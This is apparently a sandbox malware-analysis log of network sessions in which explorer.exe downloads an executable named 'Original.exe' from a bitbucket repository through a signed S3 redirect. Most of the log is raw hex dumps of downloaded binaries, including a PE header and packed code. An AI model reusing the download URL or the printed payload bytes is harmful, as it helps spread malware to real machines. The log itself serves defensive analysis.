                                                                                                                                                        2021-12-28 02:24:00 UTC1699INData Raw: 00 8d 4d ec e8 24 d0 fe ff 8b 00 83 78 14 00 75 1e 8b 4d 0c 51 e8 c3 09 ff ff 83 c4 04 89 45 bc 8d 4d ec e8 d5 cf fe ff 8b 45 bc eb 6a eb 60 6a 00 6a 00 6a ff 8b 55 0c 52 6a 09 8d 4d ec e8 ea cf fe ff 8b 00 8b 48 04 51 ff 15 38 12 40 00 89 45 fc 83 7d fc 00 75 21 e8 30 1e ff ff c7 00 2a 00 00 00 c7 45 b8 ff ff ff ff 8d 4d ec e8 8b cf fe ff 8b 45 b8 eb 20 eb 16 8b 55 fc 83 ea 01 89 55 b4 8d 4d ec e8 73 cf fe ff 8b 45 b4 eb 08 8d 4d ec e8 66 cf fe ff 8b e5 5d c3 cc cc 8b ff 55 8b ec 83 ec 4c c7 45 fc 00 00 00 00 83 7d 0c 00 75 06 83 7d 10 00 74 15 83 7d 0c 00 74 06 83 7d 10 00 77 09 c7 45 c4 00 00 00 00 eb 07 c7 45 c4 01 00 00 00 8b 45 c4 89 45 e0 83 7d e0 00 75 21 68 40 95 40 00 6a 00 68 f1 00 00 00 68 50 94 40 00 6a 02 e8 e5 0c ff ff 83 c4 14 83 f8 01 75
                                                                                                                                                        Data Ascii: M$xuMQEMEj`jjjURjMHQ8@E}u!0*EME UUMsEMf]ULE}u}t}t}wEEEE}u!h@@jhhP@ju
                                                                                                                                                        2021-12-28 02:24:00 UTC1700INData Raw: 8b 4d e4 89 08 8b 55 fc 89 55 c8 8d 4d e8 e8 ea cb fe ff 8b 45 c8 8b e5 5d c3 cc cc cc 8b ff 55 8b ec 6a 00 8b 45 18 50 8b 4d 14 51 8b 55 10 52 8b 45 0c 50 8b 4d 08 51 e8 60 fc ff ff 83 c4 18 5d c3 cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 78 a1 80 3b 4b 00 33 c5 89 45 dc c7 45 fc 00 00 00 00 c7 45 f0 00 00 00 00 83 7d 08 00 74 0d 83 7d 10 00 75 07 33 c0 e9 9c 04 00 00 33 c0 83 7d 0c 00 0f 95 c0 89 45 d0 83 7d d0 00 75 1e 68 5c 96 40 00 6a 00 6a 66 68 f8 95 40 00 6a 02 e8 36 09 ff ff 83 c4 14 83 f8 01 75 01 cc 83 7d d0 00 75 2e e8 d2 19 ff ff c7 00 16 00 00 00 6a 00 6a 66 68 f8 95 40 00 68 d0 95 40 00 68 5c 96 40 00 e8 e4 22 ff ff 83 c4 14 83 c8 ff e9 38 04 00 00 8b 55 14 52 8d 4d e0 e8 2d ca fe ff 83 7d 08 00 0f 84 2e 03 00 00 8d 4d e0 e8 2b
                                                                                                                                                        Data Ascii: MUUME]UjEPMQUREPMQ`]Ux;K3EEE}t}u33}E}uh\@jjfh@j6u}u.jjfh@h@h\@"8URM-}.M+
                                                                                                                                                        2021-12-28 02:24:00 UTC1716INData Raw: fe ff 8b e5 5d c3 8d 49 00 93 4f 4a 00 8f 50 4a 00 c2 50 4a 00 37 51 4a 00 84 51 4a 00 90 51 4a 00 d3 51 4a 00 0e 53 4a 00 11 51 4a 00 1c 51 4a 00 06 51 4a 00 fb 50 4a 00 29 51 4a 00 32 51 4a 00 00 05 05 01 05 05 05 05 05 05 05 02 05 03 05 05 04 8d 49 00 3f 52 4a 00 f3 52 4a 00 10 52 4a 00 fe 52 4a 00 09 53 4a 00 00 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 01 04 04 04 02 04 04 04 04 04 04 04 04 04 04 03 90 9e 56 4a 00 4b 53 4a 00 8b 54 4a 00 65 58 4a 00 f5 53 4a 00 b5 56 4a 00 61 53 4a 00 43 58 4a 00 a7 55 4a 00 a6 58 4a 00 5e 58 4a 00 a1 54 4a 00 55 58 4a 00 71 58 4a 00 4c 5b 4a 00 00 0e 01 0e 00 0e 00 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 02 0e 0e 0e 0e 03 0e 04 0e 0e 0e 0e 0e 0e 05 0e 06 07 05 05 05 0e 07 0e
                                                                                                                                                        Data Ascii: ]IOJPJPJ7QJQJQJQJSJQJQJQJPJ)QJ2QJI?RJRJRJRJSJVJKSJTJeXJSJVJaSJCXJUJXJ^XJTJUXJqXJL[J
                                                                                                                                                        2021-12-28 02:24:00 UTC1717INData Raw: 8d 4d fc 51 8b 55 f4 52 8d 45 f8 50 68 00 01 00 00 8d 4d e4 e8 14 88 fe ff 8b 08 8b 51 14 52 8d 4d e4 e8 06 88 fe ff 50 e8 a0 9c fe ff 83 c4 24 89 45 f4 83 7d f4 00 75 13 8b 45 08 89 45 d8 8d 4d e4 e8 b6 87 fe ff 8b 45 d8 eb 41 83 7d f4 01 75 16 0f b6 4d fc 89 4d d4 8d 4d e4 e8 9c 87 fe ff 8b 45 d4 eb 27 eb 1d 0f b6 55 fd 0f b6 45 fc c1 e0 08 0b d0 89 55 d0 8d 4d e4 e8 7d 87 fe ff 8b 45 d0 eb 08 8d 4d e4 e8 70 87 fe ff 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 57 56 53 8b 4d 10 0b c9 74 4d 8b 75 08 8b 7d 0c b7 41 b3 5a b6 20 8d 49 00 8a 26 0a e4 8a 07 74 27 0a c0 74 23 83 c6 01 83 c7 01 3a e7 72 06 3a e3 77 02 02 e6 3a c7 72 06 3a c3 77 02 02 c6 3a e0 75 0b 83 e9 01 75 d1 33 c9 3a e0 74 09 b9 ff ff ff ff 72 02 f7 d9 8b c1 5b 5e 5f c9 c3 cc
                                                                                                                                                        Data Ascii: MQUREPhMQRMP$E}uEEMEA}uMMME'UEUM}EMp]UWVSMtMu}AZ I&t't#:r:w:r:w:uu3:tr[^_
                                                                                                                                                        2021-12-28 02:24:00 UTC1733INData Raw: 00 ff ff ff ff f0 95 4a 00 00 00 00 00 f8 95 4a 00 00 00 00 00 13 96 4a 00 22 05 93 19 03 00 00 00 24 a2 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 40 96 4a 00 22 05 93 19 01 00 00 00 60 a2 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 70 96 4a 00 22 05 93 19 01 00 00 00 8c a2 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff a0 96 4a 00 22 05 93 19 01 00 00 00 b8 a2 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff d0 96 4a 00 22 05 93 19 01 00 00 00 e4 a2 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 25 b9 48 00 40 00
                                                                                                                                                        Data Ascii: JJJ"$J@J"`JpJ"JJ"JJ"J@%H@
                                                                                                                                                        2021-12-28 02:24:00 UTC1734INData Raw: 00 5c 0f 49 00 00 00 00 00 00 00 00 00 24 10 49 00 00 00 00 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 fb 30 49 00 00 00 00 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 24 34 49 00 00 00 00 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 51 45 49 00 00 00 00 00 fe ff ff ff 00 00 00 00 c8 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 ce 47 49 00 ff ff ff ff 50 97 4a 00 22 05 93 19 01 00 00 00 b4 a6 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 98 57 49 00 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 62 5b 49 00 fe ff ff ff 00 00
                                                                                                                                                        Data Ascii: \I$I0I$4IQEIGIPJ"JWIb[I
                                                                                                                                                        2021-12-28 02:24:00 UTC1750INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:00 UTC1751INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:00 UTC1767INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:01 UTC1768INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:01 UTC1784INData Raw: a1 9f 44 dd 37 37 81 81 1b 1b 1b 29 29 29 13 f9 d0 91 fb 72 72 72 72 c3 8d 66 b9 b7 b7 b7 e3 c1 c1 c1 c1 c1 58 58 b7 cf 80 8d 66 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 ff ff ff 00 ff ff ff 00 fc 00 03 00 f8 00 03 00 f0 00 03 00 e0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 ff ff ff 00 ff ff ff 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 23 26 24 00 1e 23 25 00 27 28 2e 00 88 bf d6 00 83 7a 7f 00 21 21 1f 00 30 32
                                                                                                                                                        Data Ascii: D77)))rrrrfXXfrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr( #&$#%'(.z!!02
                                                                                                                                                        2021-12-28 02:24:01 UTC1785INData Raw: 00 25 2a 29 00 22 22 29 00 2d 30 2a 00 26 30 2b 00 25 23 2b 00 2d 28 2a 00 2c 23 2a 00 89 aa c2 00 23 29 2e 00 29 2b 2a 00 94 ce d9 00 ba b8 bf 00 7b 81 85 00 1e 29 22 00 93 8b 8c 00 7d 7e 83 00 2a 24 2b 00 22 21 2a 00 24 28 16 00 26 24 2c 00 20 30 26 00 cb d5 c4 00 a4 ce d0 00 2c 2e 25 00 27 28 1d 00 2c 23 2d 00 23 1c 27 00 20 28 19 00 2e 22 29 00 1f 33 23 00 2b 1f 20 00 28 27 2f 00 28 2a 23 00 1f 25 1d 00 29 22 2a 00 a6 a6 ac 00 2c 29 35 00 31 28 27 00 2d 32 21 00 2d 28 25 00 2d 23 2e 00 20 23 24 00 2d 2f 2b 00 25 24 2f 00 7e 82 7f 00 9d c7 d6 00 2d 27 2f 00 32 32 27 00 26 2c 2a 00 32 25 22 00 25 25 2a 00 30 30 29 00 21 25 28 00 2c 2a 24 00 7f cc db 00 24 2a 2a 00 29 28 30 00 ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad f3 92 92 92 92 92
                                                                                                                                                        Data Ascii: %*)"")-0*&0+%#+-(*,#*#).)+*{)"}~*$+"!*$(&$, 0&,.%'(,#-#' (.")3#+ ('/(*#%)"*,)51('-2!-(%-#. #$-/+%$/~-'/22'&,*2%"%%*00)!%(,*$$**)(0
                                                                                                                                                        2021-12-28 02:24:01 UTC1801INData Raw: 00 69 00 64 00 61 00 78 00 69 00 20 00 68 00 65 00 68 00 61 00 64 00 61 00 6c 00 69 00 76 00 6f 00 6d 00 75 00 79 00 20 00 78 00 61 00 6c 00 6f 00 6b 00 69 00 72 00 61 00 74 00 6f 00 20 00 77 00 65 00 67 00 69 00 6d 00 65 00 63 00 69 00 79 00 6f 00 6c 00 20 00 6d 00 61 00 6d 00 75 00 76 00 65 00 72 00 61 00 67 00 75 00 6b 00 75 00 56 00 56 00 69 00 78 00 61 00 61 00 79 00 61 00 77 00 20 00 6b 00 75 00 79 00 61 00 74 00 75 00 62 00 61 00 66 00 65 00 20 00 66 00 75 00 63 00 75 00 79 00 75 00 6a 00 61 00 77 00 69 00 6a 00 69 00 20 00 79 00 65 00 63 00 69 00 64 00 65 00 66 00 61 00 6d 00 69 00 6b 00 6f 00 20 00 6c 00 6f 00 77 00 61 00 63 00 6f 00 6a 00 69 00 66 00 69 00 6a 00 75 00 20 00 64 00 75 00 77 00 65 00 66 00 6f 00 70 00 6f 00 77 00 65 00 78 00 75 00
                                                                                                                                                        Data Ascii: idaxi hehadalivomuy xalokirato wegimeciyol mamuveragukuVVixaayaw kuyatubafe fucuyujawiji yecidefamiko lowacojifiju duwefopowexu
                                                                                                                                                        2021-12-28 02:24:01 UTC1802INData Raw: 00 64 00 65 00 79 00 69 00 78 00 20 00 66 00 65 00 77 00 75 00 3f 00 4c 00 65 00 74 00 61 00 20 00 6a 00 65 00 6a 00 65 00 74 00 69 00 64 00 75 00 6e 00 75 00 73 00 61 00 6d 00 65 00 20 00 63 00 61 00 6d 00 69 00 78 00 65 00 62 00 75 00 66 00 69 00 7a 00 20 00 64 00 75 00 74 00 75 00 64 00 20 00 74 00 65 00 6d 00 6f 00 6e 00 75 00 7a 00 20 00 77 00 69 00 67 00 75 00 67 00 75 00 20 00 62 00 75 00 6e 00 75 00 6b 00 69 00 6b 00 65 00 6e 00 6f 00 57 00 5a 00 69 00 6b 00 69 00 63 00 6f 00 6d 00 6f 00 78 00 20 00 6e 00 75 00 6d 00 75 00 6c 00 65 00 78 00 65 00 6c 00 65 00 62 00 65 00 70 00 20 00 77 00 75 00 64 00 75 00 70 00 75 00 20 00 67 00 6f 00 6b 00 65 00 76 00 69 00 6c 00 69 00 67 00 61 00 63 00 6f 00 20 00 7a 00 69 00 68 00 61 00 68 00 65 00 6e 00 69 00
                                                                                                                                                        Data Ascii: deyix fewu?Leta jejetidunusame camixebufiz dutud temonuz wigugu bunukikenoWZikicomox numulexelebep wudupu gokeviligaco zihaheni
                                                                                                                                                        2021-12-28 02:24:01 UTC1818INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:01 UTC1819INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        4192.168.2.349861104.192.141.1443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-12-28 02:24:03 UTC1821OUTGET /erkermacher/eclipse/downloads/Original.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                        2021-12-28 02:24:03 UTC1821INHTTP/1.1 302 Found
                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                        Server: nginx
                                                                                                                                                        X-Usage-Quota-Remaining: 999224.121
                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                        X-Usage-Request-Cost: 787.53
                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        X-B3-TraceId: f87a6a3aa06b91f8
                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                        X-Dc-Location: Micros
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:24:03 GMT
                                                                                                                                                        X-Usage-User-Time: 0.021920
                                                                                                                                                        X-Usage-System-Time: 0.001706
                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/931d4d65-0999-46ef-a088-c6ca413195e0/downloads/d4407d09-c074-4208-91cf-dd06968366b5/Original.exe?Signature=cP199pYfJwRSEMBSNgZo4gpVPkI%3D&Expires=1640659850&AWSAccessKeyId=AKIA6KOSE3BNA7WTAGHW&versionId=qHsyz7Z0XxrBSgIUQ7vNQcW7uixcA2m1&response-content-disposition=attachment%3B%20filename%3D%22Original.exe%22
                                                                                                                                                        X-Served-By: 54747ceb68ed
                                                                                                                                                        Expires: Tue, 28 Dec 2021 02:24:03 GMT
                                                                                                                                                        Content-Language: en
                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                        X-Static-Version: dfb18959be9c
                                                                                                                                                        X-Render-Time: 0.0396909713745
                                                                                                                                                        Connection: close
                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                        X-Request-Count: 489
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Version: dfb18959be9c
                                                                                                                                                        X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                        Content-Length: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        5192.168.2.34986252.217.141.225443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-12-28 02:24:04 UTC1823OUTGET /931d4d65-0999-46ef-a088-c6ca413195e0/downloads/d4407d09-c074-4208-91cf-dd06968366b5/Original.exe?Signature=cP199pYfJwRSEMBSNgZo4gpVPkI%3D&Expires=1640659850&AWSAccessKeyId=AKIA6KOSE3BNA7WTAGHW&versionId=qHsyz7Z0XxrBSgIUQ7vNQcW7uixcA2m1&response-content-disposition=attachment%3B%20filename%3D%22Original.exe%22 HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                        2021-12-28 02:24:04 UTC1823INHTTP/1.1 200 OK
                                                                                                                                                        x-amz-id-2: hOv2g12OAWb5Zkc8Hothn1qp38uY5lC1RjWp82su/GJeUsaZiu3Bq0xCJuD0g9LfmSXcaTjCcgo=
                                                                                                                                                        x-amz-request-id: ZNE1VHMCF070P28E
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:24:05 GMT
                                                                                                                                                        Last-Modified: Sat, 25 Dec 2021 13:57:52 GMT
                                                                                                                                                        ETag: "8b504eeee773cf6df3e020a739c72152"
                                                                                                                                                        x-amz-version-id: qHsyz7Z0XxrBSgIUQ7vNQcW7uixcA2m1
                                                                                                                                                        Content-Disposition: attachment; filename="Original.exe"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                        Server: AmazonS3
                                                                                                                                                        Content-Length: 570368
                                                                                                                                                        Connection: close
                                                                                                                                                        2021-12-28 02:24:04 UTC1824INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a8 3b 64 c9 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 00 03 00 00 b2 05 00 00 00 00 00 0e 1f 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;d0 @ @
                                                                                                                                                        2021-12-28 02:24:04 UTC1831INData Raw: 00 00 00 00 20 04 00 00 00 8d 06 00 00 01 80 03 00 00 04 7e 03 00 00 04 20 00 00 00 00 fe 06 08 00 00 06 9b 7e 03 00 00 04 20 01 00 00 00 fe 06 09 00 00 06 9b 7e 03 00 00 04 20 02 00 00 00 fe 06 0a 00 00 06 9b 7e 03 00 00 04 20 03 00 00 00 fe 06 0b 00 00 06 9b 2a 13 30 07 00 5a 0b 00 00 0a 00 00 11 20 26 00 00 00 8d 01 00 00 01 fe 0e 00 00 fe 0d 01 00 25 20 01 00 00 00 54 46 fe 0e 0e 00 fe 0c 0e 00 20 04 00 00 00 5a fe 0e 03 00 fe 0c 0e 00 20 08 00 00 00 5a fe 0e 06 00 20 03 00 00 00 8d 01 00 00 01 fe 0e 05 00 20 03 00 00 00 8d 02 00 00 01 fe 0e 12 00 20 03 00 00 00 8d 03 00 00 01 fe 0e 08 00 20 02 00 00 00 8d 18 00 00 01 25 fe 0e 04 00 fe 0e 15 00 20 02 00 00 00 8d 03 00 00 01 25 fe 0e 0a 00 fe 0e 0c 00 20 03 00 00 00 8d 04 00 00 01 25 fe 0e 09 00 fe 0e
                                                                                                                                                        Data Ascii: ~ ~ ~ ~ *0Z &% TF Z Z % % %
                                                                                                                                                        2021-12-28 02:24:04 UTC1847INData Raw: 00 00 00 58 fe 0e 11 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 d3 f9 ff ff fe 0c 12 00 fe 0c 08 00 fe 0c 05 00 fe 0c 11 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 05 00 fe 0c 11 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 08 00 fe 0c 03 00 58 4a 59 fe 0c 05 00 fe 0c 11 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 08 00 fe 0c 03 00 58 4a 20 01 00 00 00 59 fe 03 5a 59 20 01 00 00 00 58 20 08 00 00 00 5a 58 fe 0c 03 00 58 4a 58 fe 0e 08 00 fe 0c 11 00 20 01 00 00 00 59 fe 0e 11 00 38 42 f9 ff ff 00 38 3c f9 ff ff fe 0c 0d 00 fe 0c 11 00 d0 1d 00 00 01 8c 0f 00 00 01 a2 fe 0c 10 00 fe 0c 11 00 20 04 00 00 00 9c fe 0c 11 00 20 01 00 00 00 58 fe 0e 11 00 38 08 f9 ff ff fe 0c 10 00 fe 0c 11 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 0d 00 fe
                                                                                                                                                        Data Ascii: X X8 YJ YJXJY YJXJ YZY X ZXXJX Y8B8< X8 Y
